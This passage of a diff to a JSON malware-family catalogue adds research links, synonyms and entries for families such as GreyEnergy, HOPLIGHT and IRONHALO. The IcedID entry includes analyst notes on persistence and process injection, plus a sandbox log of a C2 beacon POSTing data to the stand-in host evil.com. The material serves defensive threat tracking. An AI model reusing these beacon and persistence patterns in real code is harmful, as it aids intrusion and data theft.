"0024c2d9-673f-4999-b240-4ae61a72c9b9", + "value": "FlowerShop" + }, { "description": "", "meta": { @@ -6990,6 +8348,8 @@ "https://www.arbornetworks.com/blog/asert/formidable-formbook-form-grabber/", "https://thisissecurity.stormshield.com/2018/03/29/in-depth-formbook-malware-analysis-obfuscation-and-process-injection/", "http://www.vkremez.com/2018/01/lets-learn-dissecting-formbook.html", + "https://www.virusbulletin.com/virusbulletin/2019/01/vb2018-paper-inside-formbook-infostealer/", + "https://www.botconf.eu/wp-content/uploads/2018/12/2018-R-Jullian-In-depth-Formbook-Malware-Analysis.pdf", "https://www.peerlyst.com/posts/how-to-analyse-formbook-a-new-malware-as-a-service-sudhendu?trk=explore_page_resources_recent", "https://blog.talosintelligence.com/2018/06/my-little-formbook.html" ], @@ -7033,6 +8393,8 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.friedex", + "https://blog.trendmicro.com/trendlabs-security-intelligence/ursnif-emotet-dridex-and-bitpaymer-gangs-linked-by-a-similar-loader/", + "https://blog.trendmicro.com/trendlabs-security-intelligence/account-with-admin-privileges-abused-to-install-bitpaymer-ransomware-via-psexec", "https://www.crowdstrike.com/blog/big-game-hunting-the-evolution-of-indrik-spider-from-dridex-wire-fraud-to-bitpaymer-targeted-ransomware/", "https://www.welivesecurity.com/2018/01/26/friedex-bitpaymer-ransomware-work-dridex-authors/" ], @@ -7134,14 +8496,18 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.gandcrab", + "https://labs.bitdefender.com/2019/02/new-gandcrab-v5-1-decryptor-available-now/", "https://www.bleepingcomputer.com/news/security/gandcrab-ransomware-being-distributed-via-malspam-disguised-as-receipts/", "https://labs.bitdefender.com/2018/02/gandcrab-ransomware-decryption-tool-available-for-free/", "https://sensorstechforum.com/killswitch-file-now-available-gandcrab-v4-1-2-ransomware/", "http://asec.ahnlab.com/1145", + "https://www.bleepingcomputer.com/news/security/gandcrab-operators-use-vidar-infostealer-as-a-forerunner/", "http://www.vmray.com/cyber-security-blog/gandcrab-ransomware-evolution-analysis/", "https://www.bleepingcomputer.com/news/security/gandcrab-ransomware-distributed-by-exploit-kits-appends-gdcb-extension/", "https://isc.sans.edu/diary/23417", + "https://tccontre.blogspot.com/2018/11/re-gandcrab-downloader-theres-more-to.html", "https://blog.talosintelligence.com/2018/05/gandcrab-compromised-sites.html", + "https://www.crowdstrike.com/blog/pinchy-spider-adopts-big-game-hunting/", "http://csecybsec.com/download/zlab/20181001_CSE_GandCrabv5.pdf", "https://blog.malwarebytes.com/threat-analysis/2018/01/gandcrab-ransomware-distributed-by-rig-and-grandsoft-exploit-kits/", "https://www.europol.europa.eu/newsroom/news/pay-no-more-universal-gandcrab-decryption-tool-released-for-free-no-more-ransom" @@ -7227,38 +8593,17 @@ "value": "GearInformer" }, { - "description": "", + "description": "According to FireEye, GEMCUTTER is used in a similar capacity as BACKBEND (downloader), but maintains persistence by creating a Windows registry run key.\r\nGEMCUTTER checks for the presence of the mutex MicrosoftGMMZJ to ensure only one copy of GEMCUTTER is executing. If the mutex doesn't exist, the malware creates it and continues execution; otherwise, the malware signals the MicrosoftGMMExit event.", "meta": { "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.geodo", - "https://malfind.com/index.php/2018/07/23/deobfuscating-emotets-powershell-payload/", - "https://www.intezer.com/mitigating-emotet-the-most-common-banking-trojan/", - "http://blog.trendmicro.com/trendlabs-security-intelligence/emotet-returns-starts-spreading-via-spam-botnet/", - "https://www.welivesecurity.com/2018/11/09/emotet-launches-major-new-spam-campaign/", - "https://www.fortinet.com/blog/threat-research/deep-analysis-of-new-emotet-variant-part-2.html", - "https://blog.kryptoslogic.com/malware/2018/08/01/emotet.html", - "https://blog.trendmicro.com/trendlabs-security-intelligence/exploring-emotet-examining-emotets-activities-infrastructure/", - "https://securelist.com/analysis/publications/69560/the-banking-trojan-emotet-detailed-analysis/", - "https://cloudblogs.microsoft.com/microsoftsecure/2017/11/06/mitigating-and-eliminating-info-stealing-qakbot-and-emotet-in-corporate-networks/?source=mmpc", - "https://research.checkpoint.com/emotet-tricky-trojan-git-clones/", - "https://www.cert.pl/en/news/single/analysis-of-emotet-v4/", - "https://www.fidelissecurity.com/threatgeek/2017/07/emotet-takes-wing-spreader", - "https://www.us-cert.gov/ncas/alerts/TA18-201A", - "https://www.symantec.com/blogs/threat-intelligence/evolution-emotet-trojan-distributor", - "https://feodotracker.abuse.ch/?filter=version_e", - "https://www.gdata.de/blog/2017/10/30110-emotet-beutet-outlook-aus", - "https://blog.trendmicro.com/trendlabs-security-intelligence/new-emotet-hijacks-windows-api-evades-sandbox-analysis/", - "https://blog.kryptoslogic.com/malware/2018/10/31/emotet-email-theft.html", - "http://blog.fortinet.com/2017/05/03/deep-analysis-of-new-emotet-variant-part-1" - ], - "synonyms": [ - "Emotet", - "Heodo" + "https://malpedia.caad.fkie.fraunhofer.de/details/win.gemcutter", + "https://www2.fireeye.com/rs/fireye/images/rpt-apt30.pdf" ], + "synonyms": [], "type": [] }, - "uuid": "d29eb927-d53d-4af2-b6ce-17b3a1b34fe7", - "value": "Geodo" + "uuid": "e46ae329-a619-4cfc-8059-af326c11ee79", + "value": "GEMCUTTER" }, { "description": "", @@ -7297,11 +8642,11 @@ "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.ghole", "https://www.clearskysec.com/gholee-a-protective-edge-themed-spear-phishing-campaign/", - "http://www.trendmicro.it/media/wp/operation-woolen-goldfish-whitepaper-en.pdf", - "https://www.coresecurity.com/core-impact" + "http://www.trendmicro.it/media/wp/operation-woolen-goldfish-whitepaper-en.pdf" ], "synonyms": [ - "CoreImpact (Modified)" + "CoreImpact (Modified)", + "Gholee" ], "type": [] }, @@ -7314,6 +8659,7 @@ "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.ghostnet", "https://en.wikipedia.org/wiki/GhostNet", + "https://www.nartv.org/2019/03/28/10-years-since-ghostnet/", "http://contagiodump.blogspot.com/2011/07/jul-25-mac-olyx-gh0st-backdoor-in-rar.html" ], "synonyms": [ @@ -7352,7 +8698,8 @@ "http://www.malware-traffic-analysis.net/2018/01/04/index.html", "https://www.nccgroup.trust/uk/about-us/newsroom-and-events/blogs/2018/april/decoding-network-data-from-a-gh0st-rat-variant/", "http://www.hexblog.com/?p=1248", - "https://blog.cylance.com/the-ghost-dragon" + "https://blog.cylance.com/the-ghost-dragon", + "https://www.intezer.com/blog-chinaz-relations/" ], "synonyms": [ "Gh0st RAT", @@ -7391,6 +8738,19 @@ "uuid": "d9e6adf2-4f31-48df-a7ef-cf25d299f68c", "value": "GlassRAT" }, + { + "description": "", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.glitch_pos", + "https://blog.talosintelligence.com/2019/03/glitchpos-new-pos-malware-for-sale.html" + ], + "synonyms": [], + "type": [] + }, + "uuid": "d2e0cbfb-c647-48ec-84e2-ca2199cf7d03", + "value": "GlitchPOS" + }, { "description": "", "meta": { @@ -7672,7 +9032,7 @@ "value": "Graftor" }, { - "description": "POS malware targets systems that run physical point-of-sale device and operates by inspecting the process memory for data that matches the structure of credit card data (Track1 and Track2 data), such as the account number, expiration date, and other information stored on a card’s magnetic stripe. After the cards are first scanned, the personal account number (PAN) and accompanying data sit in the point-of-sale system’s memory unencrypted while the system determines where to send it for authorization. \r\nMasked as the LogMein software, the GratefulPOS malware appears to have emerged during the fall 2017 shopping season with low detection ratio according to some of the earliest detections displayed on VirusTotal. The first sample was upload in November 2017. Additionally, this malware appears to be related to the Framework POS malware, which was linked to some of the high-profile merchant breaches in the past.", + "description": "POS malware targets systems that run physical point-of-sale device and operates by inspecting the process memory for data that matches the structure of credit card data (Track1 and Track2 data), such as the account number, expiration date, and other information stored on a card\u2019s magnetic stripe. After the cards are first scanned, the personal account number (PAN) and accompanying data sit in the point-of-sale system\u2019s memory unencrypted while the system determines where to send it for authorization. \r\nMasked as the LogMein software, the GratefulPOS malware appears to have emerged during the fall 2017 shopping season with low detection ratio according to some of the earliest detections displayed on VirusTotal. The first sample was upload in November 2017. Additionally, this malware appears to be related to the Framework POS malware, which was linked to some of the high-profile merchant breaches in the past.", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.grateful_pos", @@ -7716,6 +9076,19 @@ "uuid": "1de27925-f94c-462d-acb6-f75822e05ec4", "value": "Gravity RAT" }, + { + "description": "", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.grease", + "https://asert.arbornetworks.com/stolen-pencil-campaign-targets-academia/" + ], + "synonyms": [], + "type": [] + }, + "uuid": "4ed079e6-69bd-481b-b873-86ced9ded750", + "value": "GREASE" + }, { "description": "", "meta": { @@ -7731,6 +9104,23 @@ "uuid": "9d0ddcb9-b0da-436a-af73-d9307609bd17", "value": "GreenShaitan" }, + { + "description": "", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.grey_energy", + "https://www.nozominetworks.com/2019/02/12/blog/greyenergy-malware-research-paper-maldoc-to-backdoor/", + "https://www.welivesecurity.com/wp-content/uploads/2018/10/ESET_GreyEnergy.pdf", + "https://www.eset.com/int/greyenergy-exposed/", + "https://securelist.com/greyenergys-overlap-with-zebrocy/89506/", + "https://github.com/NozomiNetworks/greyenergy-unpacker" + ], + "synonyms": [], + "type": [] + }, + "uuid": "5a683d4f-31a1-423e-a136-d348910ca967", + "value": "GreyEnergy" + }, { "description": "", "meta": { @@ -7822,6 +9212,8 @@ "https://www.fireeye.com/blog/threat-research/2016/09/hancitor_aka_chanit.html", "https://researchcenter.paloaltonetworks.com/2018/02/unit42-compromised-servers-fraud-accounts-recent-hancitor-attacks/", "https://www.vkremez.com/2018/11/lets-learn-in-depth-reversing-of.html", + "https://www.uperesia.com/hancitor-packer-demystified", + "https://0ffset.net/reverse-engineering/malware-analysis/reversing-hancitor-again/", "https://www.zscaler.com/blogs/research/chanitor-downloader-actively-installing-vawtrak", "https://boozallenmts.com/resources/news/closer-look-hancitor", "https://researchcenter.paloaltonetworks.com/2016/08/unit42-pythons-and-unicorns-and-hancitoroh-my-decoding-binaries-through-emulation/" @@ -7880,6 +9272,7 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.hawkeye_keylogger", + "https://blog.talosintelligence.com/2019/04/hawkeye-reborn.html", "https://cloudblogs.microsoft.com/microsoftsecure/2018/07/11/hawkeye-keylogger-reborn-v8-an-in-depth-campaign-analysis/", "https://nakedsecurity.sophos.com/2016/02/29/the-hawkeye-attack-how-cybercrooks-target-small-businesses-for-big-money/", "https://www.fireeye.com/blog/threat-research/2017/07/hawkeye-malware-distributed-in-phishing-campaign.html", @@ -7888,6 +9281,7 @@ "https://researchcenter.paloaltonetworks.com/2015/10/surveillance-malware-trends-tracking-predator-pain-and-hawkeye/" ], "synonyms": [ + "HawkEye Reborn", "Predator Pain" ], "type": [] @@ -7914,6 +9308,7 @@ "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.helminth", "https://www.fireeye.com/blog/threat-research/2016/05/targeted_attacksaga.html", + "https://unit42.paloaltonetworks.com/dns-tunneling-in-the-wild-overview-of-oilrigs-dns-tunneling/", "https://researchcenter.paloaltonetworks.com/2016/05/the-oilrig-campaign-attacks-on-saudi-arabian-organizations-deliver-helminth-backdoor/", "http://researchcenter.paloaltonetworks.com/2016/10/unit42-oilrig-malware-campaign-updates-toolset-and-expands-targets/" ], @@ -7955,7 +9350,8 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.heriplor", - "https://www.symantec.com/connect/blogs/dragonfly-western-energy-sector-targeted-sophisticated-attack-group" + "https://www.symantec.com/connect/blogs/dragonfly-western-energy-sector-targeted-sophisticated-attack-group", + "https://insights.sei.cmu.edu/cert/2019/03/api-hashing-tool-imagine-that.html" ], "synonyms": [], "type": [] @@ -7982,6 +9378,7 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.hermes_ransom", + "https://blog.dcso.de/enterprise-malware-as-a-service/", "https://www.proofpoint.com/us/threat-insight/post/new-version-azorult-stealer-improves-loading-features-spreads-alongside" ], "synonyms": [], @@ -8096,7 +9493,7 @@ "value": "HLUX" }, { - "description": "", + "description": " a 64-bit Windows password dumper/cracker that has previously been used in conjunction with AIRBREAK and BADFLICK backdoors. Some strings are obfuscated with XOR x56. The malware accepts up to two arguments at the command line: one to display cleartext credentials for each login session, and a second to display cleartext credentials, NTLM hashes, and malware version for each login session.", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.homefry", @@ -8108,6 +9505,20 @@ "uuid": "1fb57e31-b97e-45c3-a922-a49ed6dd966d", "value": "homefry" }, + { + "description": "", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.hoplight", + "https://www.us-cert.gov/ncas/analysis-reports/AR19-100A", + "https://www.computing.co.uk/ctg/news/3074007/lazarus-rises-warning-over-new-hoplight-malware-linked-with-north-korea" + ], + "synonyms": [], + "type": [] + }, + "uuid": "3e489132-8687-46b3-b9a7-74ba8fafaddf", + "value": "HOPLIGHT" + }, { "description": "", "meta": { @@ -8198,7 +9609,8 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.hworm", - "http://researchcenter.paloaltonetworks.com/2016/10/unit42-houdinis-magic-reappearance/?adbsc=social67221546&adbid=790972447373668352&adbpl=tw&adbpr=4487645412" + "http://researchcenter.paloaltonetworks.com/2016/10/unit42-houdinis-magic-reappearance/?adbsc=social67221546&adbid=790972447373668352&adbpl=tw&adbpr=4487645412", + "http://blogs.360.cn/post/analysis-of-apt-c-37.html" ], "synonyms": [ "houdini" @@ -8222,19 +9634,23 @@ "value": "HyperBro" }, { - "description": "Analysis Observations:\r\n\r\n* It sets up persistence by creating a Scheduled Task with the following characteristics:\r\n * Name: Update\r\n * Trigger: At Log on\r\n * Action: %LocalAppData%\\$Example\\\\waroupada.exe /i\r\n * Conditions: Stop if the computer ceases to be idle.\r\n* The sub-directory within %LocalAppdata%, Appears to be randomly picked from the list of directories within %ProgramFiles%. This needs more verification.\r\n* The filename remained static during analysis.\r\n* The original malware exe (ex. waroupada.exe) will spawn an instance of svchost.exe as a sub-process and then inject/execute its malicious code within it\r\n* If “/i” is not passed as an argument, it sets up persistence and waits for reboot.\r\n* If “/I” is passed as an argument (as is the case when the scheduled task is triggered at login), it skips persistence setup and actually executes; resulting in C2 communication.\r\n* Employs an interesting method for sleeping by calling the Sleep function of kernel32.dll from the shell, like so:\r\n rundll32.exe kernel32,Sleep -s\r\n* Setup a local listener to proxy traffic on 127.0.0.1:50000\r\n\r\n**[Example Log from C2 Network Communication]**\r\n[2018-03-19 12:45:55] [42078] [https_443_tcp 44785] [172.16.0.130:54803] connect\r\n[2018-03-19 12:45:55] [42078] [https_443_tcp 44785] [172.16.0.130:54803] recv: POST /forum/posting.php?a=0&b=4FC0302F4C59D8CDB8&d=0&e=63&f=0&g=0&h=0&r=0&i=266390&j=11 HTTP/1.1\r\n[2018-03-19 12:45:55] [42078] [https_443_tcp 44785] [172.16.0.130:54803] recv: Connection: close\r\n[2018-03-19 12:45:55] [42078] [https_443_tcp 44785] [172.16.0.130:54803] recv: Content-Type: application/x-www-form-urlencoded\r\n[2018-03-19 12:45:55] [42078] [https_443_tcp 44785] [172.16.0.130:54803] recv: Content-Length: 196\r\n[2018-03-19 12:45:55] [42078] [https_443_tcp 44785] [172.16.0.130:54803] recv: Host: evil.com\r\n[2018-03-19 12:45:55] [42078] [https_443_tcp 44785] [172.16.0.130:54803] recv: <(POSTDATA)>\r\n[2018-03-19 12:45:55] [42078] [https_443_tcp 44785] [172.16.0.130:54803] info: POST data stored to: /var/lib/inetsim/http/postdata/a90b931cb23df85aa6e3f0039958b031c3b053a2\r\n[2018-03-19 12:45:55] [42078] [https_443_tcp 44785] [172.16.0.130:54803] info: **Request URL: hxxps://evil.com/forum/posting.php?a=0&b=4FC0302F4C59D8CDB8&d=0&e=63&f=0&g=0&h=0&r=0&i=266390&j=11**\r\n[2018-03-19 12:45:55] [42078] [https_443_tcp 44785] [172.16.0.130:54803] info: Sending fake file configured for extension 'php'.\r\n[2018-03-19 12:45:55] [42078] [https_443_tcp 44785] [172.16.0.130:54803] send: HTTP/1.1 200 OK\r\n[2018-03-19 12:45:55] [42078] [https_443_tcp 44785] [172.16.0.130:54803] send: Content-Type: text/html\r\n[2018-03-19 12:45:55] [42078] [https_443_tcp 44785] [172.16.0.130:54803] send: Server: INetSim HTTPs Server\r\n[2018-03-19 12:45:55] [42078] [https_443_tcp 44785] [172.16.0.130:54803] send: Date: Mon, 19 Mar 2018 16:45:55 GMT\r\n[2018-03-19 12:45:55] [42078] [https_443_tcp 44785] [172.16.0.130:54803] send: Connection: Close\r\n[2018-03-19 12:45:55] [42078] [https_443_tcp 44785] [172.16.0.130:54803] send: Content-Length: 258\r\n[2018-03-19 12:45:55] [42078] [https_443_tcp 44785] [172.16.0.130:54803] info: Sending file: /var/lib/inetsim/http/fakefiles/sample.html\r\n[2018-03-19 12:45:55] [42078] [https_443_tcp 44785] [172.16.0.130:54803] stat: 1 **method=POST url=hxxps://evil.com/forum/posting.php?a=0&b=4FC0302F4C59D8CDB8&d=0&e=63&f=0&g=0&h=0&r=0&i=266390&j=11** sent=/var/lib/inetsim/http/fakefiles/sample.html postdata=/var/lib/inetsim/http/postdata/a90b931cb23df85aa6e3f0039958b031c3b053a2", + "description": "Analysis Observations:\r\n\r\n* It sets up persistence by creating a Scheduled Task with the following characteristics:\r\n * Name: Update\r\n * Trigger: At Log on\r\n * Action: %LocalAppData%\\$Example\\\\waroupada.exe /i\r\n * Conditions: Stop if the computer ceases to be idle.\r\n* The sub-directory within %LocalAppdata%, Appears to be randomly picked from the list of directories within %ProgramFiles%. This needs more verification.\r\n* The filename remained static during analysis.\r\n* The original malware exe (ex. waroupada.exe) will spawn an instance of svchost.exe as a sub-process and then inject/execute its malicious code within it\r\n* If \u201c/i\u201d is not passed as an argument, it sets up persistence and waits for reboot.\r\n* If \u201c/I\u201d is passed as an argument (as is the case when the scheduled task is triggered at login), it skips persistence setup and actually executes; resulting in C2 communication.\r\n* Employs an interesting method for sleeping by calling the Sleep function of kernel32.dll from the shell, like so:\r\n rundll32.exe kernel32,Sleep -s\r\n* Setup a local listener to proxy traffic on 127.0.0.1:50000\r\n\r\n**[Example Log from C2 Network Communication]**\r\n[2018-03-19 12:45:55] [42078] [https_443_tcp 44785] [172.16.0.130:54803] connect\r\n[2018-03-19 12:45:55] [42078] [https_443_tcp 44785] [172.16.0.130:54803] recv: POST /forum/posting.php?a=0&b=4FC0302F4C59D8CDB8&d=0&e=63&f=0&g=0&h=0&r=0&i=266390&j=11 HTTP/1.1\r\n[2018-03-19 12:45:55] [42078] [https_443_tcp 44785] [172.16.0.130:54803] recv: Connection: close\r\n[2018-03-19 12:45:55] [42078] [https_443_tcp 44785] [172.16.0.130:54803] recv: Content-Type: application/x-www-form-urlencoded\r\n[2018-03-19 12:45:55] [42078] [https_443_tcp 44785] [172.16.0.130:54803] recv: Content-Length: 196\r\n[2018-03-19 12:45:55] [42078] [https_443_tcp 44785] [172.16.0.130:54803] recv: Host: evil.com\r\n[2018-03-19 12:45:55] [42078] [https_443_tcp 44785] [172.16.0.130:54803] recv: <(POSTDATA)>\r\n[2018-03-19 12:45:55] [42078] [https_443_tcp 44785] [172.16.0.130:54803] info: POST data stored to: /var/lib/inetsim/http/postdata/a90b931cb23df85aa6e3f0039958b031c3b053a2\r\n[2018-03-19 12:45:55] [42078] [https_443_tcp 44785] [172.16.0.130:54803] info: **Request URL: hxxps://evil.com/forum/posting.php?a=0&b=4FC0302F4C59D8CDB8&d=0&e=63&f=0&g=0&h=0&r=0&i=266390&j=11**\r\n[2018-03-19 12:45:55] [42078] [https_443_tcp 44785] [172.16.0.130:54803] info: Sending fake file configured for extension 'php'.\r\n[2018-03-19 12:45:55] [42078] [https_443_tcp 44785] [172.16.0.130:54803] send: HTTP/1.1 200 OK\r\n[2018-03-19 12:45:55] [42078] [https_443_tcp 44785] [172.16.0.130:54803] send: Content-Type: text/html\r\n[2018-03-19 12:45:55] [42078] [https_443_tcp 44785] [172.16.0.130:54803] send: Server: INetSim HTTPs Server\r\n[2018-03-19 12:45:55] [42078] [https_443_tcp 44785] [172.16.0.130:54803] send: Date: Mon, 19 Mar 2018 16:45:55 GMT\r\n[2018-03-19 12:45:55] [42078] [https_443_tcp 44785] [172.16.0.130:54803] send: Connection: Close\r\n[2018-03-19 12:45:55] [42078] [https_443_tcp 44785] [172.16.0.130:54803] send: Content-Length: 258\r\n[2018-03-19 12:45:55] [42078] [https_443_tcp 44785] [172.16.0.130:54803] info: Sending file: /var/lib/inetsim/http/fakefiles/sample.html\r\n[2018-03-19 12:45:55] [42078] [https_443_tcp 44785] [172.16.0.130:54803] stat: 1 **method=POST url=hxxps://evil.com/forum/posting.php?a=0&b=4FC0302F4C59D8CDB8&d=0&e=63&f=0&g=0&h=0&r=0&i=266390&j=11** sent=/var/lib/inetsim/http/fakefiles/sample.html postdata=/var/lib/inetsim/http/postdata/a90b931cb23df85aa6e3f0039958b031c3b053a2", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.icedid", "https://blog.talosintelligence.com/2018/04/icedid-banking-trojan.html", "https://digitalguardian.com/blog/iceid-banking-trojan-targeting-banks-payment-card-providers-e-commerce-sites", "https://www.fidelissecurity.com/threatgeek/2017/11/tracking-emotet-payload-icedid", + "https://securityintelligence.com/icedid-operators-using-atsengine-injection-panel-to-hit-e-commerce-sites/", "https://www.youtube.com/watch?v=wObF9n2UIAM", "https://securityintelligence.com/new-banking-trojan-icedid-discovered-by-ibm-x-force-research/", "https://www.youtube.com/watch?v=7Dk7NkIbVqY", + "https://www.crowdstrike.com/blog/digging-into-bokbots-core-module/", "https://www.vkremez.com/2018/09/lets-learn-deeper-dive-into.html", "http://www.intezer.com/icedid-banking-trojan-shares-code-pony-2-0-trojan/", - "https://blog.fox-it.com/2018/08/09/bokbot-the-rebirth-of-a-banker/" + "https://blog.fox-it.com/2018/08/09/bokbot-the-rebirth-of-a-banker/", + "https://www.crowdstrike.com/blog/bokbots-man-in-the-browser-overview/", + "https://www.crowdstrike.com/blog/sin-ful-spiders-wizard-spider-and-lunar-spider-sharing-the-same-web/" ], "synonyms": [ "BokBot" @@ -8330,6 +9746,7 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.imminent_monitor_rat", + "https://ti.360.net/blog/articles/apt-c-36-continuous-attacks-targeting-colombian-government-institutions-and-corporations-en/", "https://itsjack.cc/blog/2016/01/imminent-monitor-4-rat-analysis-a-glance/" ], "synonyms": [], @@ -8383,24 +9800,49 @@ "uuid": "22755fda-497e-4ef0-823e-5cb6d8701420", "value": "InvisiMole" }, + { + "description": " IRONHALO is a downloader that uses the HTTP protocol to retrieve a Base64 encoded payload from a hard-coded command-and-control (CnC) server and uniform resource locator (URL) path.\r\n The encoded payload is written to a temporary file, decoded and executed in a hidden window. The encoded and decoded payloads are written to files named igfxHK[%rand%].dat and igfxHK[%rand%].exe respectively, where [%rand%] is a 4-byte hexadecimal number based on the current timestamp. It persists by copying itself to the current user\u2019s Startup folder.", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.ironhalo", + "https://www.symantec.com/security-center/writeup/2015-122210-5128-99", + "https://www.fireeye.com/blog/threat-research/2015/12/the-eps-awakens-part-two.html", + "https://www.fireeye.com/blog/threat-research/2015/12/the_eps_awakens.html" + ], + "synonyms": [], + "type": [] + }, + "uuid": "44599616-3849-4960-9379-05307287ff80", + "value": "IRONHALO" + }, { "description": "2006 Gozi v1.0, Gozi CRM, CRM, Papras\r\n2010 Gozi v2.0, Gozi ISFB, ISFB, Pandemyia(*)\r\n\r\nIn September 2010, the source code of a particular Gozi CRM dll version was leaked. This led to two main branches: one became known as Gozi Prinimalka, which was merge with Pony and became Vawtrak/Neverquest.\r\n\r\nThe other branch became known as Gozi ISFB, or ISFB in short. Webinject functionality was added to this version.\r\n\r\nThere is one panel which often was used in combination with ISFB: IAP. The panel's login page comes with the title 'Login - IAP'. The body contains 'AUTHORIZATION', 'Name:', 'Password:' and a single button 'Sign in' in a minimal design. Often, the panel is directly accessible by entering the C2 IP address in a browser. But there are ISFB versions which are not directly using IAP. The bot accesses a gate, which is called the 'Dreambot' gate. See win.dreambot for further information.\r\n\r\nISFB often was protected by Rovnix. This led to a further complication in the naming scheme - many companies started to call ISFB Rovnix. Because the signatures started to look for Rovnix, other trojans protected by Rovnix (in particular ReactorBot and Rerdom) sometimes got wrongly labelled.\r\n\r\nIn April 2016 a combination of Gozi ISFB and Nymaim was detected. This breed became known as GozNym. The merge uses a shellcode-like version of Gozi ISFB, that needs Nymaim to run. The C2 communication is performed by Nymaim.\r\n\r\nSee win.gozi for additional historical information.", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.isfb", - "https://www.vkremez.com/2018/08/lets-learn-in-depth-reversing-of-recent.html", - "https://arielkoren.com/blog/2016/11/01/ursnif-malware-deep-technical-dive/", - "https://github.com/gbrindisi/malware/tree/master/windows/gozi-isfb", - "https://www.fireeye.com/blog/threat-research/2017/11/ursnif-variant-malicious-tls-callback-technique.html", + "https://blog.trendmicro.com/trendlabs-security-intelligence/ursnif-emotet-dridex-and-bitpaymer-gangs-linked-by-a-similar-loader/", + "https://blog.talosintelligence.com/2019/01/amp-tracks-ursnif.html", + "https://blog.minerva-labs.com/attackers-insert-themselves-into-the-email-conversation-to-spread-malware", "https://lokalhost.pl/gozi_tree.txt", - "https://www.youtube.com/watch?v=jlc7Ahp8Iqg", "https://isc.sans.edu/forums/diary/Reviewing+the+spam+filters+Malspam+pushing+GoziISFB/23245", - "https://blog.malwarebytes.com/threat-analysis/2017/04/binary-options-malvertising-campaign-drops-isfb-banking-trojan/", "http://blog.talosintelligence.com/2018/03/gozi-isfb-remains-active-in-2018.html", "https://securityintelligence.com/meet-goznym-the-banking-malware-offspring-of-gozi-isfb-and-nymaim/", - "https://journal.cecyf.fr/ojs/index.php/cybin/article/view/15", + "https://www.cylance.com/en_us/blog/threat-spotlight-ursnif-infostealer-malware.html", + "https://www.vkremez.com/2018/08/lets-learn-in-depth-reversing-of-recent.html", + "https://www.youtube.com/watch?v=KvOpNznu_3w", "https://www.rsa.com/de-de/resources/pandemiya-emerges-new-malware-alternative-zeus-based", - "https://www.cylance.com/en_us/blog/threat-spotlight-ursnif-infostealer-malware.html" + "https://www.youtube.com/watch?v=jlc7Ahp8Iqg", + "http://benkow.cc/DreambotSAS19.pdf", + "https://blog.malwarebytes.com/threat-analysis/2017/04/binary-options-malvertising-campaign-drops-isfb-banking-trojan/", + "https://www.cyberbit.com/blog/endpoint-security/new-ursnif-malware-variant/", + "https://journal.cecyf.fr/ojs/index.php/cybin/article/view/15", + "https://0ffset.net/reverse-engineering/analyzing-com-mechanisms-in-malware/", + "https://www.fireeye.com/blog/threat-research/2017/11/ursnif-variant-malicious-tls-callback-technique.html", + "https://0ffset.net/reverse-engineering/malware-analysis/analysing-isfb-loader/", + "https://arielkoren.com/blog/2016/11/01/ursnif-malware-deep-technical-dive/", + "https://github.com/gbrindisi/malware/tree/master/windows/gozi-isfb", + "https://blog.yoroi.company/research/ursnif-the-latest-evolution-of-the-most-popular-banking-malware/", + "https://www.cybereason.com/blog/new-ursnif-variant-targets-japan-packed-with-new-features" ], "synonyms": [ "Gozi ISFB", @@ -8417,7 +9859,8 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.ismagent", - "http://www.clearskysec.com/ismagent/" + "http://www.clearskysec.com/ismagent/", + "https://unit42.paloaltonetworks.com/dns-tunneling-in-the-wild-overview-of-oilrigs-dns-tunneling/" ], "synonyms": [], "type": [] @@ -8452,6 +9895,19 @@ "uuid": "8c95cb51-1044-4dcd-9cac-ad9f2e3b9070", "value": "iSpy Keylogger" }, + { + "description": "", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.israbye", + "https://twitter.com/malwrhunterteam/status/1085162243795369984" + ], + "synonyms": [], + "type": [] + }, + "uuid": "c5cec575-325c-44b8-af24-4feb330eec8a", + "value": "IsraBye" + }, { "description": "ISR Stealer is a modified version of the Hackhound Stealer. It is written in VB and often comes in a .NET-wrapper.\r\nISR Stealer makes use of two Nirsoft tools: Mail PassView and WebBrowserPassView.\r\n\r\nIncredibly, it uses an hard-coded user agent string: HardCore Software For : Public", "meta": { @@ -8524,9 +9980,12 @@ "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.jaku", "https://www.forcepoint.com/sites/default/files/resources/files/report_jaku_analysis_of_botnet_campaign_en_0.pdf", + "https://securelist.com/whos-really-spreading-through-the-bright-star/68978/", "https://www-01.ibm.com/support/docview.wss?uid=ssg1S1010146" ], "synonyms": [ + "C3PRO-RACOON", + "KCNA Infostealer", "Reconcyc" ], "type": [] @@ -8547,6 +10006,20 @@ "uuid": "af6e89ec-0adb-4ce6-b4e6-610827e722ea", "value": "Jasus" }, + { + "description": "Ransomware written in Go.", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.jcry", + "https://twitter.com/IdoNaor1/status/1101936940297924608", + "https://twitter.com/0xffff0800/status/1102078898320302080" + ], + "synonyms": [], + "type": [] + }, + "uuid": "fea703ec-9b24-4119-96b3-7ae6bec3b203", + "value": "JCry" + }, { "description": "", "meta": { @@ -8693,6 +10166,19 @@ "uuid": 